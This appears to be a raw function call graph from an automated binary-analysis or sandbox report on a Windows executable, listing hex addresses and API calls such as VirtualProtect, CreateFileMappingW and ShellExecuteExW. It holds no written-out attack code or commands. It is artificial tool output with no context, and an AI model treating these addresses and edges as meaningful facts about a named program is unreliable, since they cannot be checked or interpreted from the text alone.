27703->27704 27705 295203 27704->27705 27705->27695 27707 294d38 27706->27707 27708 294d5e 27706->27708 27725 294dd5 27707->27725 27708->27682 27710 294d3d 27711 294d59 27710->27711 27730 294efe 27710->27730 27735 294d5f GetModuleHandleW GetProcAddress GetProcAddress 27711->27735 27714 294fa7 27715 294fc3 27714->27715 27716 294fbf RtlReleaseSRWLockExclusive 27714->27716 27715->27682 27716->27682 27718 294f7e 27717->27718 27719 294fa0 27717->27719 27720 294dd5 DloadReleaseSectionWriteAccess 4 API calls 27718->27720 27719->27701 27721 294f83 27720->27721 27722 294f9b 27721->27722 27723 294efe DloadProtectSection 3 API calls 27721->27723 27738 294fa2 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 27722->27738 27723->27722 27736 294d5f GetModuleHandleW GetProcAddress GetProcAddress 27725->27736 27727 294dda 27728 294df2 RtlAcquireSRWLockExclusive 27727->27728 27729 294df6 27727->27729 27728->27710 27729->27710 27733 294f13 DloadProtectSection 27730->27733 27731 294f19 27731->27711 27732 294f4e VirtualProtect 27732->27731 27733->27731 27733->27732 27737 294e14 VirtualQuery GetSystemInfo 27733->27737 27735->27714 27736->27727 27737->27732 27738->27719 27742 29437d 27743 294389 __EH_prolog3_GS 27742->27743 27760 284318 27743->27760 27749 2943dc 27771 271a66 27749->27771 27753 2943f5 27778 290678 PeekMessageW 27753->27778 27759 294430 27784 295787 27759->27784 27761 284328 27760->27761 27787 284349 27761->27787 27764 286a25 27814 2868d4 27764->27814 27767 2725a4 27768 2725b2 27767->27768 27769 2725ad 27767->27769 27768->27749 27770 271a66 26 API calls 27769->27770 27770->27768 27772 271a71 27771->27772 27773 271a80 27771->27773 27774 2712a7 26 API calls 27772->27774 27775 271de7 27773->27775 27774->27773 27776 271df3 SetDlgItemTextW 27775->27776 27777 271df1 27775->27777 27776->27753 27777->27776 27779 2906cc 27778->27779 27780 290693 GetMessageW 27778->27780 27779->27759 27783 2719a9 26 API calls 27779->27783 27781 2906a9 IsDialogMessageW 27780->27781 27782 2906b8 TranslateMessage DispatchMessageW 27780->27782 27781->27779 27781->27782 27782->27779 27783->27759 27785 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 27784->27785 27786 294446 27785->27786 27793 28347b 27787->27793 27790 28436c LoadStringW 27791 284346 27790->27791 27792 284383 LoadStringW 27790->27792 27791->27764 27792->27791 27800 28338e 27793->27800 27796 2834bc 27798 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 27796->27798 27799 2834d1 27798->27799 27799->27790 27799->27791 27801 2833c2 27800->27801 27809 283445 _strncpy 27800->27809 27806 2833e2 27801->27806 27811 2889ed WideCharToMultiByte 27801->27811 27802 283413 27813 29d097 26 API calls 3 library calls 27802->27813 27803 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 27805 283474 27803->27805 27805->27796 27810 2834d5 26 API calls 27805->27810 27806->27802 27812 2842b2 50 API calls __vsnprintf 27806->27812 27809->27803 27810->27796 27811->27806 27812->27802 27813->27809 27815 2868e0 __EH_prolog3_GS 27814->27815 27829 28663b 27815->27829 27820 286929 27821 28696e 27820->27821 27842 286a3d 27820->27842 27845 277ff0 28 API calls 27820->27845 27823 28698e 27821->27823 27846 277ff0 28 API calls 27821->27846 27826 2869d2 27823->27826 27847 2719a9 26 API calls 27823->27847 27824 295787 5 API calls 27827 2869e8 27824->27827 27826->27824 27827->27767 27830 2866df 27829->27830 27831 286651 27829->27831 27833 27adcc 27830->27833 27831->27830 27832 271b63 28 API calls 27831->27832 27832->27831 27834 27ae43 27833->27834 27838 27addd 27833->27838 27855 271a92 28 API calls 27834->27855 27837 27ade8 27837->27820 27838->27837 27848 2712d3 28 API calls Concurrency::cancel_current_task 27838->27848 27840 27ae17 27849 2711b8 27840->27849 27899 27f68d 27842->27899 27845->27820 27846->27823 27847->27826 27848->27840 27850 2711c3 27849->27850 27851 2711cb 27849->27851 27870 2711dd 27850->27870 27853 2711c9 27851->27853 27856 2956f6 27851->27856 27853->27837 27858 2956fb 27856->27858 27859 295715 27858->27859 27861 295717 27858->27861 27879 29d08c 27858->27879 27893 29e91a 7 API calls 2 library calls 27858->27893 27859->27853 27862 271a25 Concurrency::cancel_current_task 27861->27862 27864 295721 27861->27864 27886 29734a 27862->27886 27865 29734a _com_raise_error RaiseException 27864->27865 27866 296628 27865->27866 27867 271a41 27869 271a5a 27867->27869 27889 2712a7 27867->27889 27869->27853 27871 271206 27870->27871 27872 2711e8 27870->27872 27898 271a25 27 API calls 2 library calls 27871->27898 27874 2956f6 28 API calls 27872->27874 27876 2711ee 27874->27876 27875 27120b 27877 2711f5 27876->27877 27897 29ac9e 26 API calls _abort 27876->27897 27877->27853 27884 2a040e _abort 27879->27884 27880 2a044c 27895 2a01d3 20 API calls _abort 27880->27895 27882 2a0437 RtlAllocateHeap 27883 2a044a 27882->27883 27882->27884 27883->27858 27884->27880 27884->27882 27894 29e91a 7 API calls 2 library calls 27884->27894 27887 297391 RaiseException 27886->27887 27888 297364 27886->27888 27887->27867 27888->27887 27890 2712c1 27889->27890 27891 2712b4 27889->27891 27890->27869 27896 2719a9 26 API calls 27891->27896 27893->27858 27894->27884 27895->27883 27896->27890 27898->27875 27900 27f6a4 __vswprintf_c_l 27899->27900 27903 29cee1 27900->27903 27906 29afa4 27903->27906 27907 29afcc 27906->27907 27908 29afe4 27906->27908 27923 2a01d3 20 API calls _abort 27907->27923 27908->27907 27910 29afec 27908->27910 27925 29b543 38 API calls 2 library calls 27910->27925 27911 29afd1 27924 29ac8e 26 API calls _abort 27911->27924 27914 29affc 27926 29b50e 20 API calls 2 library calls 27914->27926 27916 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 27918 27f6ae 27916->27918 27917 29b074 27927 29b8f3 51 API calls 3 library calls 27917->27927 27918->27820 27921 29afdc 27921->27916 27922 29b07f 27928 29b5c6 20 API calls _free 27922->27928 27923->27911 27924->27921 27925->27914 27926->27917 27927->27922 27928->27921 27929 27e0b0 27930 27e0c9 27929->27930 27935 27e850 27930->27935 27932 27e0fb 27933 27e850 111 API calls 27933->27932 27936 27e862 27935->27936 27940 27e875 27935->27940 27937 27e0cd 27936->27937 27944 279490 109 API calls 27936->27944 27937->27933 27939 27e888 SetFilePointer 27939->27937 27941 27e8a4 GetLastError 27939->27941 27940->27937 27940->27939 27941->27937 27942 27e8ae 27941->27942 27942->27937 27945 279490 109 API calls 27942->27945 27944->27940 27945->27937 27946 295680 27947 295696 _com_error::_com_error 27946->27947 27948 29734a _com_raise_error RaiseException 27947->27948 27949 2956a4 27948->27949 27950 294fce ___delayLoadHelper2@8 17 API calls 27949->27950 27951 2956bc 27950->27951 27952 290900 27953 29090f __EH_prolog3_catch_GS 27952->27953 28198 271e44 27953->28198 27956 29125b 28304 293796 27956->28304 27957 290940 27961 290951 27957->27961 27962 290a20 27957->27962 28001 29095f 27957->28001 27966 29095a 27961->27966 27967 2909fc 27961->27967 27968 290ab0 27962->27968 27969 290a36 27962->27969 27964 29127b SendMessageW 27965 29128a 27964->27965 27970 2912a3 GetDlgItem SendMessageW 27965->27970 27971 291293 SendDlgItemMessageW 27965->27971 27976 284318 53 API calls 27966->27976 27966->28001 27973 290a15 EndDialog 27967->27973 27967->28001 28208 271ce2 27968->28208 27974 284318 53 API calls 27969->27974 28322 281309 27970->28322 27971->27970 27973->28001 27978 290a53 SetDlgItemTextW 27974->27978 27980 29098d 27976->27980 27982 290a5f 27978->27982 27979 2912e3 GetDlgItem 27983 291302 27979->27983 28359 271900 29 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 27980->28359 27981 290b01 GetDlgItem 27985 290b38 SetFocus 27981->27985 27986 290b15 SendMessageW SendMessageW 27981->27986 27990 290a68 GetMessageW 27982->27990 27982->28001 28331 271e05 27983->28331 27991 290b48 27985->27991 27992 290b6f 27985->27992 27986->27985 27988 290994 27994 2909a4 27988->27994 28000 271de7 SetDlgItemTextW 27988->28000 27995 290a7f IsDialogMessageW 27990->27995 27990->28001 27997 284318 53 API calls 27991->27997 28382 277673 27992->28382 27993 29130c 28334 28f2ce GetClassNameW 27993->28334 27994->28001 28360 2719a9 26 API calls 27994->28360 27995->27982 28002 290a8e TranslateMessage DispatchMessageW 27995->28002 27996 29113a 28003 284318 53 API calls 27996->28003 28004 290b52 27997->28004 28000->27994 28361 295796 28001->28361 28002->27982 28010 29114b SetDlgItemTextW 28003->28010 28364 2714a7 28004->28364 28005 271a66 26 API calls 28005->28001 28015 291160 28010->28015 28014 290b88 28019 284318 53 API calls 28014->28019 28020 284318 53 API calls 28015->28020 28018 291346 28024 291377 28018->28024 28027 284318 53 API calls 28018->28027 28023 290b9f 28019->28023 28025 29117e 28020->28025 28021 290b6a 28028 271a66 26 API calls 28021->28028 28022 291d4f 48 API calls 28022->28018 28026 286a25 53 API calls 28023->28026 28033 291d4f 48 API calls 28024->28033 28088 291490 28024->28088 28029 2714a7 28 API calls 28025->28029 28031 290ba9 28026->28031 28032 291359 SetDlgItemTextW 28027->28032 28034 290bce 28028->28034 28035 291187 28029->28035 28030 291595 28044 2915ad 28030->28044 28045 2915a0 EnableWindow 28030->28045 28037 293572 21 API calls 28031->28037 28038 284318 53 API calls 28032->28038 28039 29138d 28033->28039 28040 290be0 28034->28040 28387 293d64 26 API calls __EH_prolog3_GS 28034->28387 28036 2911f5 28035->28036 28049 2714a7 28 API calls 28035->28049 28041 284318 53 API calls 28036->28041 28046 290bbb 28037->28046 28047 29136d SetDlgItemTextW 28038->28047 28053 2913ad 28039->28053 28083 2913ce 28039->28083 28043 290c07 28040->28043 28388 27ed0d 28040->28388 28048 2911ff 28041->28048 28222 27eaf3 28043->28222 28051 2915c8 28044->28051 28418 271cc4 GetDlgItem KiUserCallbackDispatcher 28044->28418 28045->28044 28052 271a66 26 API calls 28046->28052 28047->28024 28054 2714a7 28 API calls 28048->28054 28055 2911a6 28049->28055 28061 2915f0 28051->28061 28073 2915e8 SendMessageW 28051->28073 28052->28021 28415 28e265 34 API calls __EH_prolog3_GS 28053->28415 28062 29120b 28054->28062 28065 284318 53 API calls 28055->28065 28057 291d4f 48 API calls 28057->28088 28060 291560 28417 28e265 34 API calls __EH_prolog3_GS 28060->28417 28066 290ae4 28061->28066 28074 284318 53 API calls 28061->28074 28079 2714a7 28 API calls 28062->28079 28063 2915bf 28419 271cc4 GetDlgItem KiUserCallbackDispatcher 28063->28419 28101 2911b6 28065->28101 28066->28005 28068 290c20 GetLastError 28069 290c2b 28068->28069 28232 282226 28069->28232 28073->28061 28081 291609 SetDlgItemTextW 28074->28081 28075 290c01 28391 28fa79 25 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28075->28391 28077 290c40 28084 290c4c GetLastError 28077->28084 28085 290c5d 28077->28085 28078 291587 28086 271a66 26 API calls 28078->28086 28087 291224 28079->28087 28080 2714a7 28 API calls 28080->28088 28081->28066 28089 291d4f 48 API calls 28083->28089 28123 29147c 28083->28123 28084->28085 28093 290c79 GetTickCount 28085->28093 28094 290d0f 28085->28094 28159 290cfd 28085->28159 28090 291593 28086->28090 28098 271a66 26 API calls 28087->28098 28088->28030 28088->28060 28088->28080 28091 284318 53 API calls 28088->28091 28135 271a66 26 API calls 28088->28135 28092 291405 28089->28092 28090->28030 28091->28088 28096 29140e DialogBoxParamW 28092->28096 28092->28123 28235 27325c 28093->28235 28100 290f94 28094->28100 28392 2813f9 28094->28392 28095 291046 28267 271e1f GetDlgItem ShowWindow 28095->28267 28102 29142c EndDialog 28096->28102 28096->28123 28104 291243 28098->28104 28106 290acb EndDialog 28100->28106 28413 279733 28 API calls _wcslen 28100->28413 28109 271a66 26 API calls 28101->28109 28102->28001 28115 291448 28102->28115 28111 271a66 26 API calls 28104->28111 28105 29105b 28268 271e1f GetDlgItem ShowWindow 28105->28268 28106->28066 28114 2911e9 28109->28114 28118 29124e 28111->28118 28113 290d39 28403 28505a 114 API calls 28113->28403 28122 271a66 26 API calls 28114->28122 28115->28001 28416 2719a9 26 API calls 28115->28416 28117 290c9f 28124 271a66 26 API calls 28117->28124 28125 271a66 26 API calls 28118->28125 28119 291064 28126 284318 53 API calls 28119->28126 28120 290fae 28130 284318 53 API calls 28120->28130 28122->28036 28123->28057 28128 290cab 28124->28128 28125->28066 28129 29106e SetDlgItemTextW 28126->28129 28127 290d51 28133 286a25 53 API calls 28127->28133 28245 27de9a 28128->28245 28269 271e1f GetDlgItem ShowWindow 28129->28269 28132 290fd4 28130->28132 28141 271a66 26 API calls 28132->28141 28146 290d80 GetCommandLineW 28133->28146 28134 291082 SetDlgItemTextW GetDlgItem 28137 29109f GetWindowLongW SetWindowLongW 28134->28137 28138 2910b7 28134->28138 28135->28088 28137->28138 28270 291d4f 28138->28270 28145 290fea 28141->28145 28142 290cd5 GetLastError 28143 290ce0 28142->28143 28258 27ddc7 28143->28258 28150 271a66 26 API calls 28145->28150 28154 290e05 _wcslen 28146->28154 28149 291d4f 48 API calls 28152 2910ce 28149->28152 28153 290ff6 28150->28153 28290 293c78 28152->28290 28161 284318 53 API calls 28153->28161 28404 290405 5 API calls 2 library calls 28154->28404 28156 271a66 26 API calls 28156->28159 28158 290e23 28405 290405 5 API calls 2 library calls 28158->28405 28159->28094 28159->28095 28164 29100c 28161->28164 28163 291d4f 48 API calls 28174 2910ef 28163->28174 28166 2714a7 28 API calls 28164->28166 28165 290e2f 28406 290405 5 API calls 2 library calls 28165->28406 28170 291015 28166->28170 28168 291110 28414 271cc4 GetDlgItem KiUserCallbackDispatcher 28168->28414 28177 271a66 26 API calls 28170->28177 28171 290e3b 28407 285109 114 API calls 28171->28407 28172 290af5 28172->27996 28172->28106 28174->28168 28175 291d4f 48 API calls 28174->28175 28175->28168 28176 290e4e 28408 293e53 28 API calls __EH_prolog3 28176->28408 28179 291031 28177->28179 28181 271a66 26 API calls 28179->28181 28180 290e6b CreateFileMappingW 28182 290e9d MapViewOfFile 28180->28182 28183 290ed5 ShellExecuteExW 28180->28183 28181->28106 28184 290ed2 __InternalCxxFrameHandler 28182->28184 28185 290ef3 28183->28185 28184->28183 28186 290f3d 28185->28186 28187 290f00 WaitForInputIdle 28185->28187 28190 290f60 UnmapViewOfFile CloseHandle 28186->28190 28191 290f73 28186->28191 28188 290f1e 28187->28188 28188->28186 28189 290f23 Sleep 28188->28189 28189->28186 28189->28188 28190->28191 28409 272e8b 28191->28409 28194 271a66 26 API calls 28195 290f83 28194->28195 28196 271a66 26 API calls 28195->28196 28197 290f8e 28196->28197 28197->28100 28199 271ea6 28198->28199 28200 271e4d 28198->28200 28421 283e83 GetWindowLongW SetWindowLongW 28199->28421 28202 271eb3 28200->28202 28420 283eaa 64 API calls 3 library calls 28200->28420 28202->27956 28202->27957 28202->28001 28204 271e6f 28204->28202 28205 271e82 GetDlgItem 28204->28205 28205->28202 28206 271e92 28205->28206 28206->28202 28207 271e98 SetWindowTextW 28206->28207 28207->28202 28422 2957d8 28208->28422 28210 271cee GetDlgItem 28211 271d1d 28210->28211 28212 271d0b 28210->28212 28423 271d64 28211->28423 28213 2714a7 28 API calls 28212->28213 28215 271d18 28213->28215 28216 271d4d 28215->28216 28217 271a66 26 API calls 28215->28217 28218 271d5a 28216->28218 28219 271a66 26 API calls 28216->28219 28217->28216 28220 295787 5 API calls 28218->28220 28219->28218 28221 271d61 28220->28221 28221->27981 28221->28106 28221->28172 28224 27eaff __EH_prolog3_GS 28222->28224 28223 27eb09 28225 295787 5 API calls 28223->28225 28224->28223 28226 27eb84 28224->28226 28231 271a66 26 API calls 28224->28231 28436 27769f 28224->28436 28443 27efef 28224->28443 28227 27ebb6 28225->28227 28226->28223 28229 27efef 54 API calls 28226->28229 28227->28068 28227->28069 28229->28223 28231->28224 28233 282230 28232->28233 28234 282232 SetCurrentDirectoryW 28232->28234 28233->28234 28234->28077 28236 273280 28235->28236 28554 272f0f 28236->28554 28239 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28240 27329d 28239->28240 28241 272f45 28240->28241 28242 272f55 _wcslen 28241->28242 28558 275962 28242->28558 28244 272f63 28244->28117 28246 27dea6 __EH_prolog3_GS 28245->28246 28247 27def4 28246->28247 28248 27df09 CreateFileW 28246->28248 28249 28169a 47 API calls 28247->28249 28256 27df9e 28247->28256 28248->28247 28250 27df49 28249->28250 28252 27df6e 28250->28252 28254 27df56 28250->28254 28255 27df59 CreateFileW 28250->28255 28251 295787 5 API calls 28253 27dfdf 28251->28253 28252->28256 28567 2719a9 26 API calls 28252->28567 28253->28142 28253->28143 28254->28255 28255->28252 28256->28251 28259 27ddf8 28258->28259 28266 27de09 28258->28266 28262 27de04 28259->28262 28263 27de0b 28259->28263 28259->28266 28260 271a66 26 API calls 28261 27de18 28260->28261 28261->28156 28568 27dfe2 28262->28568 28573 27de50 28263->28573 28266->28260 28267->28105 28268->28119 28269->28134 28283 291d5e __EH_prolog3_GS 28270->28283 28272 29349a 28273 271a66 26 API calls 28272->28273 28274 2934a5 28273->28274 28275 295787 5 API calls 28274->28275 28276 2910c5 28275->28276 28276->28149 28277 27769f 45 API calls 28277->28283 28278 2725a4 26 API calls 28278->28283 28280 2714a7 28 API calls 28280->28283 28282 28645a 28 API calls 28282->28283 28283->28272 28283->28277 28283->28278 28283->28280 28283->28282 28285 271a66 26 API calls 28283->28285 28286 2934ad 28283->28286 28594 29030a 28283->28594 28598 2862cd 30 API calls 2 library calls 28283->28598 28599 28f5b2 28 API calls 28283->28599 28600 27adaa CompareStringW 28283->28600 28601 2944c0 26 API calls 28283->28601 28285->28283 28602 2758cb 45 API calls 28286->28602 28291 293c87 __EH_prolog3_catch_GS _wcslen 28290->28291 28608 286a89 28291->28608 28293 293cba 28612 277903 28293->28612 28302 295796 5 API calls 28303 2910e0 28302->28303 28303->28163 29492 28eaa6 28304->29492 28307 293885 28310 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28307->28310 28308 2937bf GetWindow 28308->28307 28309 2937d8 28308->28309 28309->28307 28312 2937e5 GetClassNameW 28309->28312 28314 293809 GetWindowLongW 28309->28314 28315 29386d GetWindow 28309->28315 28311 291266 28310->28311 28311->27964 28311->27965 29497 288da4 CompareStringW 28312->29497 28314->28315 28316 293819 SendMessageW 28314->28316 28315->28307 28315->28309 28316->28315 28318 29382f 28316->28318 29498 28eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28318->29498 29499 28eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28318->29499 29500 28ef21 11 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28318->29500 28321 293857 SendMessageW DeleteObject 28321->28315 29503 2957a5 28322->29503 28324 281315 GetCurrentDirectoryW 28325 281327 28324->28325 28328 281323 28324->28328 29504 271bbd 28 API calls 28325->29504 28327 281339 GetCurrentDirectoryW 28329 281356 _wcslen 28327->28329 28328->27979 28329->28328 28330 2712a7 26 API calls 28329->28330 28330->28328 28332 271e11 SetWindowTextW 28331->28332 28333 271e0f 28331->28333 28332->27993 28333->28332 28335 28f2f9 28334->28335 28336 28f31e 28334->28336 29505 288da4 CompareStringW 28335->29505 28338 28f32c 28336->28338 28339 28f323 SHAutoComplete 28336->28339 28341 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28338->28341 28339->28338 28340 28f30c 28340->28336 28342 28f310 FindWindowExW 28340->28342 28343 28f337 28341->28343 28342->28336 28344 28fdd1 28343->28344 28345 28fded 28344->28345 28346 2720b0 30 API calls 28345->28346 28347 28fe27 28346->28347 29506 272dbb 28347->29506 28350 28fe4c 29513 27278b 28350->29513 28351 28fe43 28352 27232c 123 API calls 28351->28352 28354 28fe48 28352->28354 28357 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28354->28357 28356 27232c 123 API calls 28356->28354 28358 28fe77 28357->28358 28358->28018 28358->28022 28359->27988 28360->28001 28362 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28361->28362 28363 2957a0 28362->28363 28363->28363 28365 2714bd _wcslen 28364->28365 28366 27120c 28 API calls 28365->28366 28367 2714ca 28366->28367 28368 293572 28367->28368 28369 290678 5 API calls 28368->28369 28370 29358d GetDlgItem 28369->28370 28371 2935e4 SendMessageW SendMessageW 28370->28371 28372 2935ac 28370->28372 28373 293643 SendMessageW 28371->28373 28374 293624 28371->28374 28375 2935b7 ShowWindow SendMessageW SendMessageW 28372->28375 28376 29365b 28373->28376 28377 29365d SendMessageW SendMessageW 28373->28377 28374->28373 28375->28371 28376->28377 28378 29367f SendMessageW 28377->28378 28379 2936a2 SendMessageW 28377->28379 28378->28379 28380 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28379->28380 28381 2936c0 28380->28381 28381->28021 28383 27768c 28382->28383 29597 277430 28383->29597 28385 277699 28386 2934eb 28 API calls __EH_prolog3_GS 28385->28386 28386->28014 28387->28040 28389 27ed1f 49 API calls 28388->28389 28390 27ed16 28389->28390 28390->28043 28390->28075 28391->28043 28393 281405 __EH_prolog3 28392->28393 28394 2956f6 28 API calls 28393->28394 28395 28140f 28394->28395 28396 281431 GetModuleFileNameW 28395->28396 28397 281463 28395->28397 28398 271be3 28 API calls 28395->28398 28396->28395 28396->28397 28399 2714a7 28 API calls 28397->28399 28398->28395 28400 28146c 28399->28400 28401 28147f 28400->28401 28402 2712a7 26 API calls 28400->28402 28401->28113 28402->28401 28403->28127 28404->28158 28405->28165 28406->28171 28407->28176 28408->28180 28410 272e93 28409->28410 28411 272ea0 28409->28411 28412 2712a7 26 API calls 28410->28412 28411->28194 28412->28411 28413->28120 28414->28172 28415->28083 28416->28123 28417->28078 28418->28063 28419->28051 28420->28204 28421->28202 28422->28210 28434 2957d8 28423->28434 28425 271d70 GetWindowTextLengthW 28435 271bbd 28 API calls 28425->28435 28427 271dab GetWindowTextW 28428 2714a7 28 API calls 28427->28428 28429 271dca 28428->28429 28430 271ddd 28429->28430 28431 2712a7 26 API calls 28429->28431 28432 295787 5 API calls 28430->28432 28431->28430 28433 271de4 28432->28433 28433->28215 28434->28425 28435->28427 28437 2776e1 28436->28437 28438 2776bb 28436->28438 28471 2758cb 45 API calls 28437->28471 28462 27120c 28438->28462 28442 2776db 28442->28224 28446 27effb __EH_prolog3_GS 28443->28446 28444 27f02f 28447 27ed0d 49 API calls 28444->28447 28445 27f01b CreateDirectoryW 28445->28444 28448 27f0d0 28445->28448 28446->28444 28446->28445 28449 27f03b 28447->28449 28450 27f0df 28448->28450 28474 27f58b 28448->28474 28451 27f0e3 GetLastError 28449->28451 28487 28169a 28449->28487 28455 295787 5 API calls 28450->28455 28451->28450 28457 27f100 28455->28457 28456 27f07d 28461 27f0ad 28456->28461 28544 2719a9 26 API calls 28456->28544 28457->28224 28458 27f073 CreateDirectoryW 28458->28456 28459 27f070 28459->28458 28461->28448 28461->28451 28463 27127d 28462->28463 28466 27121d 28462->28466 28473 271a92 28 API calls 28463->28473 28470 271228 28466->28470 28472 2712d3 28 API calls Concurrency::cancel_current_task 28466->28472 28468 271254 28469 2711b8 28 API calls 28468->28469 28469->28470 28470->28442 28472->28468 28475 27f597 __EH_prolog3_GS 28474->28475 28476 27f5a4 SetFileAttributesW 28475->28476 28477 27f5b7 28476->28477 28485 27f622 28476->28485 28479 28169a 47 API calls 28477->28479 28478 295787 5 API calls 28480 27f638 28478->28480 28481 27f5d7 28479->28481 28480->28450 28482 27f5f6 28481->28482 28483 27f5e7 SetFileAttributesW 28481->28483 28484 27f5e4 28481->28484 28482->28485 28545 2719a9 26 API calls 28482->28545 28483->28482 28484->28483 28485->28478 28488 2816e0 28487->28488 28489 2816e7 28487->28489 28491 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28488->28491 28490 2714a7 28 API calls 28489->28490 28493 2816f4 28490->28493 28492 27f063 28491->28492 28492->28456 28492->28458 28492->28459 28494 2817db 28493->28494 28495 281711 28493->28495 28496 281309 30 API calls 28494->28496 28497 28171b 28495->28497 28506 281741 28495->28506 28502 2817fb 28496->28502 28546 280ba6 28 API calls 28497->28546 28499 2818ed 28500 281739 28499->28500 28553 2719a9 26 API calls 28499->28553 28503 271a66 26 API calls 28500->28503 28501 281729 28505 2725a4 26 API calls 28501->28505 28502->28499 28508 28181f 28502->28508 28509 281875 28502->28509 28503->28488 28507 281731 28505->28507 28506->28500 28512 27769f 45 API calls 28506->28512 28510 271a66 26 API calls 28507->28510 28549 280c41 28 API calls 28508->28549 28551 280ba6 28 API calls 28509->28551 28510->28500 28515 281789 28512->28515 28513 281883 28516 2725a4 26 API calls 28513->28516 28547 280bf3 28 API calls _wcslen 28515->28547 28519 28188c 28516->28519 28517 281838 28550 271188 28 API calls 28517->28550 28522 271a66 26 API calls 28519->28522 28521 28179e 28548 27aef3 28 API calls 28521->28548 28525 281894 28522->28525 28523 281848 28530 2725a4 26 API calls 28523->28530 28552 280ddb 28 API calls 28525->28552 28526 2817b2 28528 2725a4 26 API calls 28526->28528 28532 2817be 28528->28532 28529 28189c 28536 27769f 45 API calls 28529->28536 28531 281860 28530->28531 28533 271a66 26 API calls 28531->28533 28534 271a66 26 API calls 28532->28534 28535 281868 28533->28535 28537 2817c6 28534->28537 28538 271a66 26 API calls 28535->28538 28540 281870 28536->28540 28539 271a66 26 API calls 28537->28539 28538->28540 28541 2817ce 28539->28541 28543 271a66 26 API calls 28540->28543 28542 271a66 26 API calls 28541->28542 28542->28500 28543->28499 28544->28461 28545->28485 28546->28501 28547->28521 28548->28526 28549->28517 28550->28523 28551->28513 28552->28529 28553->28500 28555 272f26 28554->28555 28556 272f2f 28554->28556 28555->28239 28557 27120c 28 API calls 28556->28557 28557->28555 28559 275975 28558->28559 28560 275a3a 28558->28560 28564 275987 28559->28564 28565 273029 28 API calls 28559->28565 28566 2758cb 45 API calls 28560->28566 28564->28244 28565->28564 28567->28256 28569 27e015 28568->28569 28572 27dfeb 28568->28572 28569->28266 28572->28569 28579 27ec63 28572->28579 28574 27de5c 28573->28574 28576 27de76 28573->28576 28574->28576 28577 27de68 CloseHandle 28574->28577 28575 27de95 28575->28266 28576->28575 28593 27925b 109 API calls 28576->28593 28577->28576 28580 27ec6f __EH_prolog3_GS 28579->28580 28581 27ec7c DeleteFileW 28580->28581 28582 27ec8c 28581->28582 28591 27ecf4 28581->28591 28584 28169a 47 API calls 28582->28584 28583 295787 5 API calls 28585 27e013 28583->28585 28586 27ecac 28584->28586 28585->28266 28587 27ecc8 28586->28587 28588 27ecbc DeleteFileW 28586->28588 28589 27ecb9 28586->28589 28587->28591 28592 2719a9 26 API calls 28587->28592 28588->28587 28589->28588 28591->28583 28592->28591 28593->28575 28595 29031d 28594->28595 28596 290324 28594->28596 28595->28283 28596->28595 28603 271b63 28596->28603 28598->28283 28599->28283 28600->28283 28601->28283 28604 271b6f 28603->28604 28605 271b8e 28603->28605 28604->28596 28607 2713f7 28 API calls 28605->28607 28607->28604 28609 286a99 _wcslen 28608->28609 28663 271be3 28609->28663 28611 286abb 28611->28293 28613 286a74 28612->28613 28614 286a89 28 API calls 28613->28614 28615 286a86 28614->28615 28616 27b03d 28615->28616 28617 27b049 __EH_prolog3_GS 28616->28617 28668 282815 28617->28668 28619 27b092 28678 27b231 28619->28678 28622 271a66 26 API calls 28623 27b120 28622->28623 28624 271a66 26 API calls 28623->28624 28625 27b128 28624->28625 28626 2956f6 28 API calls 28625->28626 28627 27b13f 28626->28627 28683 28a599 28627->28683 28629 27b172 28630 295787 5 API calls 28629->28630 28631 27b179 28630->28631 28632 27b3e1 28631->28632 28633 27b3ed __EH_prolog3_GS 28632->28633 28634 27b478 28633->28634 28637 27b484 28633->28637 28737 27f711 28633->28737 28635 271a66 26 API calls 28634->28635 28635->28637 28640 27b4e0 28637->28640 28704 27bc65 28637->28704 28639 295787 5 API calls 28641 27b543 28639->28641 28642 27b529 28640->28642 28744 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28640->28744 28644 27b194 28641->28644 28642->28639 29436 27d6bc 28644->29436 28647 27b1d0 28649 271a66 26 API calls 28647->28649 28650 27b1e8 28649->28650 28651 271a66 26 API calls 28650->28651 28652 27b1f3 28651->28652 28653 271a66 26 API calls 28652->28653 28654 27b1fe 28653->28654 29450 2828aa 28654->29450 28656 27b206 28657 271a66 26 API calls 28656->28657 28658 27b20e 28657->28658 28659 271a66 26 API calls 28658->28659 28660 27b216 28659->28660 28661 27d869 26 API calls 28660->28661 28662 27b21d 28661->28662 28662->28302 28664 271c03 28663->28664 28665 271bfb 28663->28665 28664->28665 28667 271c33 28 API calls 28664->28667 28665->28611 28667->28665 28669 282821 __EH_prolog3 28668->28669 28670 2956f6 28 API calls 28669->28670 28671 28285f 28670->28671 28672 282872 28671->28672 28689 2780ec 28671->28689 28674 2956f6 28 API calls 28672->28674 28675 282883 28674->28675 28676 2780ec 28 API calls 28675->28676 28677 282896 28675->28677 28676->28677 28677->28619 28679 2725a4 26 API calls 28678->28679 28680 27b23f 28679->28680 28681 2725a4 26 API calls 28680->28681 28682 27b118 28681->28682 28682->28622 28684 28a5a5 __EH_prolog3 28683->28684 28685 2956f6 28 API calls 28684->28685 28686 28a5bf 28685->28686 28687 28a5d6 28686->28687 28703 287445 112 API calls 28686->28703 28687->28629 28690 2780f8 __EH_prolog3 28689->28690 28695 295b4b 28690->28695 28692 278111 28693 295b4b 28 API calls 28692->28693 28694 278133 _abort 28693->28694 28694->28672 28697 295b57 __FrameHandler3::FrameUnwindToState 